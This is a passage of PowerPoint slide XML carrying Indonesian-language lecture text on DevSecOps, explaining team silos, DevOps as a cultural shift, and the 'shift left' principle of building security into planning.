              <a:t>mengamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>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129</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3535471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DevSecOps</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>awan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semakin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tradisional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemrograman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengembangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Departemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengembangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpisah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> silo, di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bekerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang lain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengembangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (DevOps) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pergeseran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>budaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendorong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kolaborasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengembang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan administrator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menciptakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terorganisir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>personel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengembang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membangun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menguji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merilis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>andal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>DevSecOps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperluas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>batasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>spesialis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>personel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencerminkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prinsip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertimbangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengembangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyebaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikenal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>istilah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> shift left, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertimbangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perencanaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicangkokkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akhir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Prinsip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>DevSecOps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menunjukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keahlian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditanamkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>proyek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengembangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pun.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tambahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
